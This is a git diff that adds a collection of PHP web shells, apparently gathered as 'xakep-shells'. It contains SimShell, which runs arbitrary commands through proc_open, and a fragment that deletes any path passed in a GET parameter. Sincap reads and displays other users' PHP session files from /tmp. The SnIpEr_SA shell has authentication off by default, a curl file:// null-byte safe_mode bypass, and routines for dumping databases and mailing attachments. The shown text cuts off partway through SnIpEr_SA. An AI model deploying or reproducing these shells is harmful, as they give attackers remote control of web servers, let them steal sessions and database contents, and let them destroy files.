+$frpath=$_GET['fdelete'];
+if ($frpath <> "") {
+if (is_dir($frpath)){
+$matches = glob($frpath . '/*.*');
+if ( is_array ( $matches ) ) {
+  foreach ( $matches as $filename) {
+  unlink ($filename);
+  rmdir("$frpath");
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+echo "<script language='javascript'> history.back(1)</script>";
+  }
+  }
+  }
+  else{
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+unlink ("$frpath");
+echo "<script language='javascript'> history.back(1)</script>";
+exit(0);
+
+  }
+  
+
+}
+			?>
+			
+			</td>
+		</tr>
+		<tr>
+			<td style="border: 1px dotted #FFCC66">
+			<p align="center"><font color="#666666" size="1" face="Tahoma"><br>
+			Copyright 2004-Simorgh Security<br>
+			Hossein-Asgari<br>
+			</font><font color="#c0c0c0" size="1" face="Tahoma">
+		<a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
+		<font color="#666666">www.simorgh-ev.com</font></a></font></td>
+		</tr>
+	</table>
+</div>
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/SimShell 1.0 - Simorgh Security MGZ.php.txt b/xakep-shells/PHP/SimShell 1.0 - Simorgh Security MGZ.php.txt
new file mode 100644
index 0000000..2fff063
--- /dev/null
+++ b/xakep-shells/PHP/SimShell 1.0 - Simorgh Security MGZ.php.txt	
@@ -0,0 +1,180 @@
+<?php
+
+/*Simorgh Security Magazine */
+  session_start();
+if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
+    $_SESSION['cwd'] = getcwd();
+    $_SESSION['history'] = array();
+    $_SESSION['output'] = '';
+  }
+  
+  if (!empty($_REQUEST['command'])) {
+    if (get_magic_quotes_gpc()) {
+      $_REQUEST['command'] = stripslashes($_REQUEST['command']);
+    }
+    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
+      unset($_SESSION['history'][$i]);
+    
+    array_unshift($_SESSION['history'], $_REQUEST['command']);
+  
+    $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
+
+    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
+      $_SESSION['cwd'] = dirname(__FILE__);
+    } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
+
+      if ($regs[1][0] == '/') {
+
+        $new_dir = $regs[1];
+      } else {
+
+        $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+      }
+      
+
+      while (strpos($new_dir, '/./') !== false)
+        $new_dir = str_replace('/./', '/', $new_dir);
+
+
+      while (strpos($new_dir, '//') !== false)
+        $new_dir = str_replace('//', '/', $new_dir);
+
+      while (preg_match('|/\.\.(?!\.)|', $new_dir))
+        $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+      
+      if ($new_dir == '') $new_dir = '/';
+      
+
+      if (@chdir($new_dir)) {
+        $_SESSION['cwd'] = $new_dir;
+      } else {
+        $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+      }
+      
+    } else {
+
+      chdir($_SESSION['cwd']);
+
+      $length = strcspn($_REQUEST['command'], " \t");
+      $token = substr($_REQUEST['command'], 0, $length);
+      if (isset($aliases[$token]))
+        $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
+    
+      $p = proc_open($_REQUEST['command'],
+                     array(1 => array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
+?>
+
+<head>
+  <title>SimShell - Simorgh Security MGZ</title>
+  <link rel="stylesheet" href="Simshell.css" type="text/css" />
+
+  <script type="text/javascript" language="JavaScript">
+  var current_line = 0;
+  var command_hist = new Array(<?php echo $js_command_hist ?>);
+  var last = 0;
+
+  function key(e) {
+    if (!e) var e = window.event;
+
+    if (e.keyCode == 38 && current_line < command_hist.length-1) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line++;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+    if (e.keyCode == 40 && current_line > 0) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line--;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+  }
+
+function init() {
+  document.shell.setAttribute("autocomplete", "off");
+  document.shell.output.scrollTop = document.shell.output.scrollHeight;
+  document.shell.command.focus();
+}
+
+  </script>
+</head>
+
+<body   onload="init()" style="color: #00FF00; background-color: #000000">
+
+<span style="background-color: #000000">
+
+
+
+</body>
+
+</body>
+</html>
+
+
+
+</span>
+
+
+
+<p><span style="background-color: #000000">&nbsp;Directory: </span> <code>
+<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code></p>
+
+<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
+<div style="width: 900; height: 454">
+<textarea name="output" readonly="readonly" cols="120" rows="20" style="color: #CCFF33; border: 1px dashed #FF0000; background-color: #000000">
+<?php
+$lines = substr_count($_SESSION['output'], "\n");
+$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
+echo rtrim($padding . $_SESSION['output']);
+?>
+</textarea>
+<p class="prompt" align="justify">
+  cmd:<input class="prompt" name="command" type="text"
+                onkeyup="key(event)" size="60" tabindex="1" style="border: 1px dotted #808080">
+  <input type="submit" value="Enter" /><input type="submit" name="reset" value="Reset" /> Rows: 
+  <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" />
+</p>
+<p class="prompt" align="center">
+  <br>
+  <br>
+&nbsp;<font color="#C0C0C0" size="2">Copyright 2004-Simorgh Security<br>
+  Make On PhpShell Kernel<br>
+  <a href="http://www.simorgh-ev.com" style="text-decoration: none">
+  <font color="#C0C0C0">www.simorgh-ev.com</font></a></font></p>
+</div>
+</form>
+
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Sincap.php.php.txt b/xakep-shells/PHP/Sincap.php.php.txt
new file mode 100644
index 0000000..96ff07a
--- /dev/null
+++ b/xakep-shells/PHP/Sincap.php.php.txt
@@ -0,0 +1,124 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) Böceði&nbsp;&nbsp; </title>
+</head>
+
+<body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">
+
+<table border="0" width="100%" id="table1" cellspacing="0" cellpadding="0" height="108">
+	<tr>
+    <td width="70" bgcolor="#000000" height="83">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="83" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    Sincap 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="83" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    <br>
+    </font><br>
+    <font color="#858585" face="Verdana" style="font-size: 8pt">www.aventgrup.net&nbsp;<br>
+    </font></span><a href="mailto:shopen@aventgrup.net">
+	<font face="Verdana" style="font-size: 8pt; text-decoration: none" color="#C0C0C0">
+	info@aventgrup.net</font></a><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  	</tr>
+	<tr>
+    <td width="1002" bgcolor="#484848" height="25" colspan="3">
+    <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">&nbsp; 
+	Linux Sessin ( Oturum ) Böceði</font></td>
+    </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#800000" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="8%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;S. 
+    No</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    Adý</font></td>
+    <td width="42%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    Deðeri</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Referans</font></td>
+  </tr>
+<tr>
+
+
+<?
+if ($sedat=@opendir("/tmp")){
+while (($ekinci=readdir ($sedat))){
+if (is_file("/tmp/$ekinci")){
+if($ekinci>"sess_"){
+$asortik=$ekinci;
+$baglan=fopen("/tmp/$ekinci",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+$toplam="$toplam$okunan";
+} fclose($baglan); 
+};
+?>
+
+
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+$metin=$toplam;
+$i=explode(";",$metin);
+?>
+
+
+
+
+<?
+foreach($i as $yeni){
+$tampon=explode("|",$yeni);
+$deger1= "$tampon[0]";
+$ich=explode(":",$tampon[1]);
+$tampon3=count($ich);
+$tampon4=$tampon3-1;
+$deger2= "$ich[$tampon4]";
+$is++;
+$temizleme=array(
+'"'=>'',
+'v'=>'',
+'c'=>''
+);
+$degerT= strtr($deger2,$temizleme);
+?>
+    <td width="8%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $is;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $deger1;?></font></td>
+    <td width="42%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $degerT;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;-</td>
+
+</tr>
+<?};?>
+
+</table>
+
+</body>
+
+</html>
+
+
diff --git a/xakep-shells/PHP/SnIpEr_SA Shell.php.txt b/xakep-shells/PHP/SnIpEr_SA Shell.php.txt
new file mode 100644
index 0000000..a3b75ee
--- /dev/null
+++ b/xakep-shells/PHP/SnIpEr_SA Shell.php.txt	
@@ -0,0 +1,2246 @@
+<?php
+/******************************************************************************************************/
+/*                                      #  ##        ##   #
+/*                                    # # ## ###   ##   ## #  #
+/*                                  # ###  ### # ###   ##  ### #
+/*                                #      ##  ######### ##   #
+/*                                          ##########
+/*                                  ###      #########      ###
+/*                                #    ##     #######     ##    #
+/*                                       ##    #####    ##
+/*                                         ##  ####  ##
+/*                                             ####   ##
+/*                                            ######
+/*                                           ## ## ##
+/*                                        @@    ##    @@
+/*                                    @ @@@    ####    @@@ @
+/*                                    @@@     ######    @@@
+/*
+/*
+/*
+/*
+/*
+/*  SnIpEr_SA.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://3asfh.net/
+/*  ??????:
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  ????????? ????????????? ?? ?????? ? ????:  ? ???? ?????? ??.
+/*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
+/*  ?? SnIpEr.SA@hotmail.com ??? ??????????? ????? ???????????.
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by SnIpEr_SA
+/*  MAIL http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+/* ~~~ ÇáÎíÇÑÇÊ | Options  ~~~ */
+
+// ÇááÛÉ | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+
+// ?????????????? | Authentification
+// $auth = 1; - áÊÝÚíá ÇáÏÎæá Èßáãå ÇáãÑæÑ  ( authentification = On  )
+// $auth = 0; - áÇíÞÇÝ ÇáÏÎæá ÈßáãÉ ÇáãÑæÑ ( authentification = Off )
+$auth = 0;
+
+// áÏÎæá ÈßáãÉ ãÑæÑ æÇÓã ãÓÊÎÏã (Login & Password for access)
+// áÍãÇíÉ ÇáÓßÑÈÊ ãä ÏÎæá ÛíÑß ÛíÑ ÇáÊÇáí!!! (CHANGE THIS!!!)
+// åäÇ æÖÚß ßáãå ÇáãÑæÑ æåí ãÔÝÑå ÈÕíÛå md5, æßáãÉÚ ÇáãÑæÑ åäÇ åí  'r57'
+// ÊÓÊÚØíÚ Çä ÊÔÝÑ ßáãÉ ãÑæÑß æÇÓã ÇáãÓÊÎÏã ÈÕíÛÉ md5 ææÖÚåÇ Ýí ÇáÎÇäÇÊ ÇáÊÇáíå
+$name='ec371748dc2da624b35a4f8f685dd122'; // ÇÓã ÇáãÓÊÎÏã  (user login)
+$pass='ec371748dc2da624b35a4f8f685dd122'; // ßáãÉ ÇáãÑæÑ (user password)
+/******************************************************************************************************/
+if(empty($_POST['SnIpEr_SA'])){
+
+} else {
+$m=$_POST['SnIpEr_SA'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+
+}
+echo "".htmlspecialchars($m)."";
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = '1.31';
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="SnIpEr_SA"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://3asfh.net>SnIpEr_SA</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- SnIpEr_SA -->
+<html>
+<head>
+<meta http-equiv="Content-Language" content="ar-sa">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
+<title>SnIpEr_SA shell</title>
+
+
+
+<STYLE>
+BODY {
+        SCROLLBAR-FACE-COLOR: #800000; SCROLLBAR-HIGHLIGHT-COLOR: #101010; SCROLLBAR-SHADOW-COLOR: #101010; SCROLLBAR-3DLIGHT-COLOR: #101010; SCROLLBAR-ARROW-COLOR: #101010; SCROLLBAR-TRACK-COLOR: #101010; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #101010
+}
+
+tr {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #ffffff;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #cccccc;
+}
+.table1 {
+BORDER: 1px;
+BACKGROUND-COLOR: #333333;
+color: #333333;
+}
+.td1 {
+BORDER: 1px;
+font: 7pt tahoma;
+color: #ffffff;
+}
+.tr1 {
+BORDER: 1px;
+color: #2279D9;
+}
+table {
+BORDER:  #eeeeee 2px outset;
+BACKGROUND-COLOR: #272727;
+color: #2279D9;
+}
+input {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #800000;
+font: 9pt tahoma;
+color: #ffffff;
+}
+select {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #000000;
+font: 9pt tahoma;
+color: #CCCCCC;;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: #272727;
+width: 40%;
+color: #2279D9;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #3D3D3D;
+font: Fixedsys bold;
+color: #ffffff;
+}
+BODY {
+margin: 2px;
+color: #2279D9;
+background-color: #000000;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        }
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    }
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";
+        $fr   .= "\x00\x00";
+        $fr   .= "\x08\x00";
+        $fr   .= $hexdtime;
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);
+        $fr      .= pack('V', $c_len);
+        $fr      .= pack('V', $unc_len);
+        $fr      .= pack('v', strlen($name));
+        $fr      .= pack('v', 0);
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x14\x00";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x08\x00";
+        $cdrec .= $hexdtime;
+        $cdrec .= pack('V', $crc);
+        $cdrec .= pack('V', $c_len);
+        $cdrec .= pack('V', $unc_len);
+        $cdrec .= pack('v', strlen($name) );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('V', 32 );
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('V', strlen($ctrldir)) .
+            pack('V', strlen($data)) .
+            "\x00\x00";
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress'))
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     }
+     else if ($compress == 'gzip' && @function_exists('gzencode'))
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     }
+     else if ($compress == 'zip' && @function_exists('gzcompress'))
+     {
+             $filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     }
+     else
+     {
+             $mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';
+ var $base = '';
+ var $db   = '';
+ var $connection;
+ var $res;
+ var $error;
+ var $rows;
+ var $columns;
+ var $num_rows;
+ var $num_fields;
+ var $dump;
+
+ function connect()
+  {
+          switch($this->db)
+     {
+           case 'MySQL':
+            if(empty($this->port)) { $this->port = '3306'; }
+            if(!function_exists('mysql_connect')) return 0;
+            $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+            if(is_resource($this->connection)) return 1;
+           break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+            if(!function_exists('mssql_connect')) return 0;
+            $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;
+  }
+
+ function select_db()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           if(@mysql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'MSSQL':
+           if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;
+  }
+
+ function query($query)
+  {
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+          case 'MySQL':
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
+      {
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      }
+     else if(is_resource($this->res)) { return 1; }
+     return 2;
+          break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection)))
+      {
+      $this->error = 'Query error';
+      return 0;
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';
+      }
+     else
+      {
+      if(@ociexecute($this->res))
+       {
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;
+       }
+      $error = @ocierror();
+      $this->error=$error['message'];
+      }
+    break;
+    }
+  return 0;
+  }
+ function get_result()
+  {
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->num_rows=@mysql_num_rows($this->res);
+           $this->num_fields=@mysql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
+           @mysql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+           $this->num_rows=@mssql_num_rows($this->res);
+           $this->num_fields=@mssql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+           @mssql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+           $this->num_rows=@pg_num_rows($this->res);
+           $this->num_fields=@pg_num_fields($this->res);
+           while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+           @pg_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0;
+  }
+ function dump($table)
+  {
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->dump[0] = '## MySQL dump';
+           if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+           if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
+            $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction';
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1;
+  }
+ function close()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           @mysql_close($this->connection);
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
